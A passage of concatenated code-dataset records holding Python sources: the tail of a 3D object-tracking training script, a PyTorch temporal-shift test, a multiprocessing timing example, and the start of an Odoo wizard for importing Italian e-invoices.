already_used_id.append(new_id)\n det_out['id'].append(torch.Tensor([new_id]).long())\n continue\n elif assign_new[curr_det_idx] == 1:\n new_id = already_used_id[-1] + 1 if len(\n already_used_id) > 0 else 0\n frame_id.append(new_id)\n fake_id.append(new_id)\n already_used_id.append(new_id)\n det_out['id'].append(torch.Tensor([new_id]).long())\n else:\n # look prev\n det_prev_num = det_split[i - 1]\n for k in range(det_prev_num):\n if assign_link[i - 1][0][k][j] == 1:\n prev_id = fake_ids[-1][k]\n frame_id.append(prev_id)\n fake_id.append(prev_id)\n det_out['id'].append(\n torch.Tensor([prev_id]).long())\n break\n\n assert len(fake_id) == det_curr_num\n fake_ids.append(fake_id)\n det_ids.append(np.array(frame_id))\n for k, v in det_out.items():\n if len(det_out[k]) == 0:\n det_out[k] = torch.Tensor([])\n else:\n det_out[k] = torch.cat(v, dim=0)\n det_out['frame_idx'] = dets[i]['frame_idx']\n dets_out.append(det_out)\n det_start_idx += det_curr_num\n return det_ids, dets_out\n\ndef align_id(self, dets_ids, dets_out):\n frame_start = 0\n if len(self.used_id) == 0:\n # Start of a sequence\n self.used_id += dets_ids\n self.frames_id += dets_ids\n self.frames_det += dets_out\n max_id = 0\n for i in range(len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n continue\n max_id = np.maximum(np.max(dets_ids[i]), max_id)\n self.last_id = np.maximum(self.last_id, max_id)\n return dets_ids, dets_out, frame_start\n elif self.frames_det[-1]['frame_idx'] != dets_out[0]['frame_idx']:\n # in case the sequence is not continuous\n aligned_ids = []\n aligned_dets = []\n max_id = 0\n id_offset = self.last_id + 1\n for i in range(len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n aligned_ids.append([])\n continue\n new_id = dets_ids[i] + id_offset\n max_id = np.maximum(np.max(new_id), max_id)\n aligned_ids.append(new_id)\n dets_out[i]['id'] += id_offset\n aligned_dets += dets_out\n self.last_id = np.maximum(self.last_id, max_id)\n self.frames_id += aligned_ids\n self.frames_det += aligned_dets\n return aligned_ids, aligned_dets, frame_start\n else:\n # the first frame of current dets\n # and the last frame of last dets is the same\n frame_start = 1\n aligned_ids = []\n aligned_dets = []\n max_id = 0\n id_pairs = {}\n \"\"\"\n assert len(dets_ids[0])== len(self.frames_id[-1])\n \"\"\"\n # Calculate Id pairs\n for i in range(len(dets_ids[0])):\n # Use minimum because because sometimes\n # they are not totally the same\n has_match = False\n for j in range(len(self.frames_id[-1])):\n if ((self.det_type == '3D'\n and torch.sum(dets_out[0]['location'][i] !=\n self.frames_det[-1]['location'][j]) == 0\n and torch.sum(dets_out[0]['bbox'][i] !=\n self.frames_det[-1]['bbox'][j]) == 0)\n or (self.det_type == '2D' and torch.sum(\n dets_out[0]['bbox'][i] != self.frames_det[-1]\n ['bbox'][j]) == 0)): # noqa\n\n id_pairs[dets_ids[0][i]] = self.frames_id[-1][j]\n has_match = True\n break\n if not has_match:\n id_pairs[dets_ids[0][i]] = self.last_id + 1\n self.last_id += 1\n if len([v for k, v in id_pairs.items()]) != len(\n set([v for k, v in id_pairs.items()])):\n print(\"ID pairs has duplicates!!!\")\n print(id_pairs)\n print(dets_ids)\n print(dets_out[0])\n print(self.frames_id[-1])\n print(self.frames_det[-1])\n\n for i in range(1, len(dets_ids)):\n if dets_out[i]['id'].size(0) == 0:\n aligned_ids.append([])\n continue\n new_id = dets_ids[i].copy()\n for j in range(len(dets_ids[i])):\n if dets_ids[i][j] in id_pairs.keys():\n new_id[j] = id_pairs[dets_ids[i][j]]\n else:\n new_id[j] = self.last_id + 1\n 
id_pairs[dets_ids[i][j]] = new_id[j]\n self.last_id += 1\n if len(new_id) != len(\n set(new_id)): # check whether there is duplicate\n print('have duplicates!!!')\n print(id_pairs)\n print(new_id)\n print(dets_ids)\n print(dets_out)\n print(self.frames_id[-1])\n print(self.frames_det[-1])\n import pdb\n pdb.set_trace()\n\n max_id = np.maximum(np.max(new_id), max_id)\n self.last_id = np.maximum(self.last_id, max_id)\n aligned_ids.append(new_id)\n dets_out[i]['id'] = torch.Tensor(new_id).long()\n # TODO: This only support check for 2 frame case\n if dets_out[1]['id'].size(0) != 0:\n aligned_dets += dets_out[1:]\n self.frames_id += aligned_ids\n self.frames_det += aligned_dets\n return aligned_ids, aligned_dets, frame_start\n\nif __name__ == '__main__':\n fire.Fire()\n", "repo_name": "HYjhkoh/3dobject_detection_temporal", "sub_path": "second/pytorch/train_2st_spatio.py", "file_name": "train_2st_spatio.py", "file_ext": "py", "file_size_in_byte": 48303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.path.append", "line_number": 40, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 79, "usage_type": "call"}, {"api_name": "utils_tr.data_util.write_kitti_result", "line_number": 92, "usage_type": "call"}, {"api_name": "kitti_devkit.evaluate_tracking.evaluate", "line_number": 100, "usage_type": "call"}, {"api_name": "utils_tr.train_util.AverageMeter", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 117, "usage_type": "call"}, {"api_name": "time.time", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 120, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "time.time", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 189, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 192, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.uint8", "line_number": 195, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 220, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 220, "usage_type": "attribute"}, {"api_name": "easydict.EasyDict", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "utils_tr.build_util.build_criterion", "line_number": 232, "usage_type": "call"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 243, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 243, "usage_type": "name"}, {"api_name": "utils_tr.build_util.build_augmentation", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 281, "usage_type": "call"}, {"api_name": "utils_tr.train_util.create_logger", "line_number": 282, "usage_type": "call"}, 
{"api_name": "pprint.pformat", "line_number": 284, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 292, "usage_type": "call"}, {"api_name": "torchplus.train.create_folder", "line_number": 293, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 293, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 295, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 300, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 300, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 303, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 303, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 307, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder.build", "line_number": 316, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder", "line_number": 316, "usage_type": "name"}, {"api_name": "second.pytorch.builder.box_coder_builder.build", "line_number": 321, "usage_type": "call"}, {"api_name": "second.pytorch.builder.box_coder_builder", "line_number": 321, "usage_type": "name"}, {"api_name": "second.builder.target_assigner_builder.build", "line_number": 323, "usage_type": "call"}, {"api_name": "second.builder.target_assigner_builder", "line_number": 323, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_endtoend_builder_spatio.build", "line_number": 333, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_endtoend_builder_spatio", "line_number": 333, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_builder.build", "line_number": 335, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_builder", "line_number": 335, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 344, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 345, "usage_type": "call"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 361, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 361, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.optimizer_builder.build", "line_number": 369, "usage_type": "call"}, {"api_name": "second.pytorch.builder.optimizer_builder", "line_number": 369, "usage_type": "name"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 373, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 373, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.lr_scheduler_builder.build", "line_number": 375, "usage_type": "call"}, {"api_name": "second.pytorch.builder.lr_scheduler_builder", "line_number": 375, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 379, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio.build", "line_number": 384, "usage_type": "call"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio", "line_number": 384, "usage_type": "name"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio.build", "line_number": 394, "usage_type": "call"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr_vid_spatio", "line_number": 394, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 406, "usage_type": "call"}, {"api_name": "time.time", "line_number": 
406, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 406, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 407, "usage_type": "attribute"}, {"api_name": "numpy.random.get_state", "line_number": 408, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 408, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 410, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 410, "usage_type": "attribute"}, {"api_name": "second.data.preprocess_tr_vid_spatio.merge_second_batch_tr_vid_spatio", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 419, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 419, "usage_type": "attribute"}, {"api_name": "second.data.preprocess_tr_vid_spatio.merge_second_batch_tr_vid_spatio", "line_number": 425, "usage_type": "name"}, {"api_name": "json.load", "line_number": 437, "usage_type": "call"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 443, "usage_type": "call"}, {"api_name": "time.time", "line_number": 447, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 458, "usage_type": "call"}, {"api_name": "utils_tr.train_util.AverageMeter", "line_number": 460, "usage_type": "call"}, {"api_name": "time.time", "line_number": 514, "usage_type": "call"}, {"api_name": "time.time", "line_number": 515, "usage_type": "call"}, {"api_name": "time.time", "line_number": 579, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 581, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 581, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 583, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 587, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 587, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 599, "usage_type": "call"}, {"api_name": "second.utils.progress_bar.ProgressBar", "line_number": 601, "usage_type": "call"}, {"api_name": "time.time", "line_number": 619, "usage_type": "call"}, {"api_name": "second.data.kitti_common.get_label_annos", "line_number": 626, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 626, "usage_type": "name"}, {"api_name": "second.utils.eval.get_official_eval_result", "line_number": 629, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 648, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 652, "usage_type": "call"}, {"api_name": "torchplus.train.save_models", "line_number": 695, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 695, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 739, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 742, "usage_type": "call"}, {"api_name": "second.data.kitti_common.kitti_result_line", "line_number": 749, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 749, "usage_type": "name"}, {"api_name": "second.data.kitti_common.get_image_index_str", "line_number": 753, "usage_type": "call"}, 
{"api_name": "second.data.kitti_common", "line_number": 753, "usage_type": "name"}, {"api_name": "second.data.kitti_common.get_start_result_anno", "line_number": 781, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 781, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 793, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 794, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 795, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 797, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 798, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 802, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 819, "usage_type": "call"}, {"api_name": "second.data.kitti_common.empty_result_anno", "line_number": 822, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 822, "usage_type": "name"}, {"api_name": "second.data.kitti_common.empty_result_anno", "line_number": 824, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 824, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 827, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 828, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 842, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 850, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 851, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 851, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 854, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 854, "usage_type": "name"}, {"api_name": "second.builder.voxel_builder.build", "line_number": 864, "usage_type": "call"}, {"api_name": "second.builder.voxel_builder", "line_number": 864, "usage_type": "name"}, {"api_name": "second.pytorch.builder.box_coder_builder.build", "line_number": 866, "usage_type": "call"}, {"api_name": "second.pytorch.builder.box_coder_builder", "line_number": 866, "usage_type": "name"}, {"api_name": "second.builder.target_assigner_builder.build", "line_number": 868, "usage_type": "call"}, {"api_name": "second.builder.target_assigner_builder", "line_number": 868, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_2stage_builder.build", "line_number": 872, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_2stage_builder", "line_number": 872, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_endtoend_builder.build", "line_number": 874, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_endtoend_builder", "line_number": 874, "usage_type": "name"}, {"api_name": "second.pytorch.builder.second_builder.build", "line_number": 876, "usage_type": "call"}, {"api_name": "second.pytorch.builder.second_builder", "line_number": 876, "usage_type": "name"}, {"api_name": "torchplus.train.try_restore_latest_checkpoints", "line_number": 882, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 882, "usage_type": "attribute"}, {"api_name": "torchplus.train.restore", "line_number": 884, "usage_type": "call"}, {"api_name": "torchplus.train", "line_number": 884, "usage_type": "attribute"}, {"api_name": "second.pytorch.builder.input_reader_builder_tr.build", "line_number": 891, "usage_type": "call"}, {"api_name": 
"second.pytorch.builder.input_reader_builder_tr", "line_number": 891, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 897, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 897, "usage_type": "attribute"}, {"api_name": "second.data.preprocess.merge_second_batch", "line_number": 903, "usage_type": "name"}, {"api_name": "torch.float16", "line_number": 906, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 908, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 913, "usage_type": "call"}, {"api_name": "second.utils.progress_bar.ProgressBar", "line_number": 917, "usage_type": "call"}, {"api_name": "time.time", "line_number": 921, "usage_type": "call"}, {"api_name": "time.time", "line_number": 924, "usage_type": "call"}, {"api_name": "time.time", "line_number": 925, "usage_type": "call"}, {"api_name": "torch.cuda.synchronize", "line_number": 926, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 926, "usage_type": "attribute"}, {"api_name": "torch.cuda.synchronize", "line_number": 929, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 929, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 930, "usage_type": "call"}, {"api_name": "time.time", "line_number": 942, "usage_type": "call"}, {"api_name": "time.time", "line_number": 944, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 947, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 948, "usage_type": "call"}, {"api_name": "second.data.kitti_common.get_label_annos", "line_number": 955, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 955, "usage_type": "name"}, {"api_name": "second.utils.eval.get_official_eval_result", "line_number": 956, "usage_type": "call"}, {"api_name": "second.utils.eval.get_coco_eval_result", "line_number": 959, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 963, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 966, "usage_type": "call"}, {"api_name": "second.data.kitti_common.annos_to_kitti_label", "line_number": 969, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 969, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 976, "usage_type": "call"}, {"api_name": "second.data.kitti_common.annos_to_kitti_label", "line_number": 980, "usage_type": "call"}, {"api_name": "second.data.kitti_common", "line_number": 980, "usage_type": "name"}, {"api_name": "second.protos.pipeline_pb2.TrainEvalPipelineConfig", "line_number": 988, "usage_type": "call"}, {"api_name": "second.protos.pipeline_pb2", "line_number": 988, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.Merge", "line_number": 991, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 991, "usage_type": "name"}, {"api_name": "google.protobuf.text_format.MessageToString", "line_number": 992, "usage_type": "call"}, {"api_name": "google.protobuf.text_format", "line_number": 992, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 1032, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1038, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1046, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1056, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1061, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1064, "usage_type": "call"}, {"api_name": "torch.cat", 
"line_number": 1066, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1083, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1084, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1097, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1097, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1101, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1123, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1125, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 1127, "usage_type": "call"}, {"api_name": "pdb.set_trace", "line_number": 1168, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1170, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 1170, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 1171, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 1173, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 1182, "usage_type": "call"}]}
+{"seq_id": "3065465405", "text": "import torch\n\n\ndef shift(x, n_segment, fold_div=3):\n nt, c, h, w = x.size()\n n_batch = int(nt / n_segment)\n x = x.view(n_batch, n_segment, c, h, w)\n fold = int(c / fold_div)\n left_side = torch.cat((x[:, 1:, :fold], torch.zeros(n_batch, 1, fold, h, w).to(x.device)), dim=1)\n middle_side = torch.cat((torch.zeros(n_batch, 1, fold, h, w).to(x.device), x[:, :n_segment - 1, fold: 2 * fold]),\n dim=1)\n out = torch.cat((left_side, middle_side, x[:, :, 2 * fold:]), dim=2)\n return out.view(nt, c, h, w)\n\n\nif __name__ == '__main__':\n nt = 16\n c = 256\n h = 2\n w = 2\n n_segment = nt\n fold_div = c\n x = torch.arange(nt*c*h*w).float().reshape([nt, c, h, w]);\n out = shift(x, n_segment, fold_div)\n print(x)\n print(out)\n", "repo_name": "itsliupeng/test_torch_cuda", "sub_path": "py/check_temporal_shift.py", "file_name": "check_temporal_shift.py", "file_ext": "py", "file_size_in_byte": 787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cat", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "30525171018", "text": "\"\"\"\nParallel processing\nDivide input(Map) and aggregate(Reduce) output\n\"\"\"\nfrom multiprocessing import Pool\nimport time\n# def fun(n):\n# return n*n\n\ndef fun(n):\n sum = 0\n for i in range(n):\n sum += i*i\n return sum\n\nif __name__ == \"__main__\":\n t1 = time.time()\n p = Pool(processes=2)\n # p.map(fun, arr)\n result = p.map(fun, range(10000))\n p.close()\n p.join()\n # result = []\n # for n in arr:\n # result.append(fun(n))\n print(\"Pool took : \", time.time()-t1)\n t2 = time.time()\n for i in range(10000):\n result.append(fun(i))\n print(\"serial processing took: \", time.time()-t2)\n\n #output\n # Pool took : 2.0030744075775146\n # serial processing took: 5.65215802192688\n\n # if take processes=3 in Pool\n # Pool took : 2.8116846084594727\n # serial processing took: 5.556454420089722\n \n\n #if i take processes = 2\n #Pool took : 3.380298376083374\n # serial processing took: 5.721689462661743\n", "repo_name": "doncans/DS", "sub_path": "multiprocessing_pool.py", "file_name": "multiprocessing_pool.py", "file_ext": "py", "file_size_in_byte": 979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 26, "usage_type": "call"}, {"api_name": "time.time", "line_number": 27, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "40676989087", "text": "import logging\nimport re\nfrom datetime import datetime\n\nfrom odoo import api, fields, models, registry\nfrom odoo.exceptions import UserError\nfrom odoo.fields import first\nfrom odoo.osv import expression\nfrom odoo.tools import float_is_zero, frozendict\nfrom odoo.tools.translate import _\n\nfrom odoo.addons.base_iban.models.res_partner_bank import pretty_iban\n\nfrom . import efattura\n\n_logger = logging.getLogger(__name__)\n\nWT_CODES_MAPPING = {\n \"RT01\": \"ritenuta\",\n \"RT02\": \"ritenuta\",\n \"RT03\": \"inps\",\n \"RT04\": \"enasarco\",\n \"RT05\": \"enpam\",\n \"RT06\": \"other\",\n}\n\n\nclass WizardImportFatturapa(models.TransientModel):\n _name = \"wizard.import.fatturapa\"\n _description = \"Import E-bill\"\n\n e_invoice_detail_level = fields.Selection(\n [\n (\"0\", \"Minimum\"),\n (\"1\", \"Tax rate\"),\n (\"2\", \"Maximum\"),\n ],\n string=\"E-bills Detail Level\",\n help=\"Minimum level: Bill is created with no lines; \"\n \"User will have to create them, according to what specified in \"\n \"the electronic bill.\\n\"\n \"Tax rate level: Rate level: an invoice line is created for each \"\n \"rate present in the electronic invoice\\n\"\n \"Maximum level: every line contained in the electronic bill \"\n \"will create a line in the bill.\",\n required=True,\n )\n price_decimal_digits = fields.Integer(\n \"Prices decimal digits\",\n required=True,\n help=\"Decimal digits used in prices computation. This is needed to correctly \"\n \"import e-invoices with many decimal digits, not being forced to \"\n \"increase decimal digits of all your prices. \"\n 'Otherwise, increase \"Product Price\" precision.',\n )\n quantity_decimal_digits = fields.Integer(\n \"Quantities decimal digits\",\n required=True,\n help='Decimal digits used for quantity field. See \"Prices decimal digits\".',\n )\n discount_decimal_digits = fields.Integer(\n \"Discounts decimal digits\",\n required=True,\n help='Decimal digits used for discount field. 
See \"Prices decimal digits\".',\n )\n\n def _get_selected_model(self):\n context = self.env.context\n model_name = context.get(\"active_model\")\n return model_name\n\n def _get_selected_records(self):\n context = self.env.context\n ids = context.get(\"active_ids\", [])\n model_name = self._get_selected_model()\n attachments = self.env[model_name].browse(ids)\n return attachments\n\n def _check_attachment(self, attachment):\n if attachment.in_invoice_ids:\n raise UserError(_(\"File %s is linked to bills yet.\", attachment.name))\n\n def _extract_supplier(self, fatturapa_attachment):\n return fatturapa_attachment.xml_supplier_id\n\n @api.model\n def default_get(self, fields_list):\n res = super().default_get(fields_list)\n res[\"price_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Product Price\"\n )\n res[\"quantity_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Product Unit of Measure\"\n )\n res[\"discount_decimal_digits\"] = self.env[\"decimal.precision\"].precision_get(\n \"Discount\"\n )\n res[\"e_invoice_detail_level\"] = \"2\"\n\n fatturapa_attachments = self._get_selected_records()\n partners = self.env[\"res.partner\"].browse()\n for fatturapa_attachment in fatturapa_attachments:\n self._check_attachment(fatturapa_attachment)\n partners |= self._extract_supplier(fatturapa_attachment)\n if len(partners) == 1:\n res[\"e_invoice_detail_level\"] = partners[0].e_invoice_detail_level\n if partners[0].e_invoice_price_decimal_digits >= 0:\n res[\"price_decimal_digits\"] = partners[\n 0\n ].e_invoice_price_decimal_digits\n if partners[0].e_invoice_quantity_decimal_digits >= 0:\n res[\"quantity_decimal_digits\"] = partners[\n 0\n ].e_invoice_quantity_decimal_digits\n if partners[0].e_invoice_discount_decimal_digits >= 0:\n res[\"discount_decimal_digits\"] = partners[\n 0\n ].e_invoice_discount_decimal_digits\n return res\n\n def CountryByCode(self, CountryCode):\n country_model = self.env[\"res.country\"]\n return country_model.search([(\"code\", \"=\", CountryCode)])\n\n def ProvinceByCode(self, provinceCode):\n province_model = self.env[\"res.country.state\"]\n return province_model.search(\n [(\"code\", \"=\", provinceCode), (\"country_id.code\", \"=\", \"IT\")]\n )\n\n def reset_inconsistencies(self):\n \"\"\"\n Clean all existing inconsistencies.\n Note that inconsistencies are in all environments.\n \"\"\"\n for env in self.env.all.envs:\n env_context = dict(env.context)\n env_context.pop(\"inconsistencies\", None)\n env.context = frozendict(env_context)\n\n def get_inconsistencies(self):\n \"\"\"\n Get all existing inconsistencies.\n \"\"\"\n return self.env.context.get(\"inconsistencies\", \"\")\n\n def log_inconsistency(self, message):\n \"\"\"\n Add `message` to existing inconsistencies.\n Note that inconsistencies are in all environments.\n \"\"\"\n inconsistencies = self.get_inconsistencies()\n if message not in inconsistencies:\n if inconsistencies:\n inconsistencies += \"\\n\"\n inconsistencies += message\n # we can't set\n # self = self.with_context(inconsistencies=inconsistencies)\n # because self is a locale variable.\n # Environments are weakly referenced,\n # so they might disappear if they are no more referenced.\n # Save the inconsistencies in all the environments\n # to avoid losing them.\n for env in self.env.all.envs:\n env_context = dict(env.context)\n env_context.setdefault(\"inconsistencies\", inconsistencies)\n env.context = frozendict(env_context)\n\n def check_partner_base_data(self, partner_id, 
DatiAnagrafici):\n partner = self.env[\"res.partner\"].browse(partner_id)\n if (\n DatiAnagrafici.Anagrafica.Denominazione\n and partner.name != DatiAnagrafici.Anagrafica.Denominazione\n ):\n self.log_inconsistency(\n _(\n \"Company Name field contains '%(name)s'.\"\n \" Your System contains '%(partner)s'\"\n )\n % {\n \"name\": DatiAnagrafici.Anagrafica.Denominazione,\n \"partner\": partner.name,\n }\n )\n if (\n DatiAnagrafici.Anagrafica.Nome\n and partner.firstname != DatiAnagrafici.Anagrafica.Nome\n ):\n self.log_inconsistency(\n _(\n \"Name field contains '%(name)s'.\"\n \" Your System contains '%(firstname)s'\"\n )\n % {\n \"name\": DatiAnagrafici.Anagrafica.Nome,\n \"firstname\": partner.firstname,\n }\n )\n if (\n DatiAnagrafici.Anagrafica.Cognome\n and partner.lastname != DatiAnagrafici.Anagrafica.Cognome\n ):\n self.log_inconsistency(\n _(\n \"Surname field contains '%(surname)s'.\"\n \" Your System contains '%(lastname)s'\"\n )\n % {\n \"surname\": DatiAnagrafici.Anagrafica.Cognome,\n \"lastname\": partner.lastname,\n }\n )\n\n def getPartnerBase(self, DatiAnagrafici): # noqa: C901\n if not DatiAnagrafici:\n return False\n partner_model = self.env[\"res.partner\"]\n cf = DatiAnagrafici.CodiceFiscale or False\n vat = False\n if DatiAnagrafici.IdFiscaleIVA:\n id_paese = DatiAnagrafici.IdFiscaleIVA.IdPaese.upper()\n id_codice = 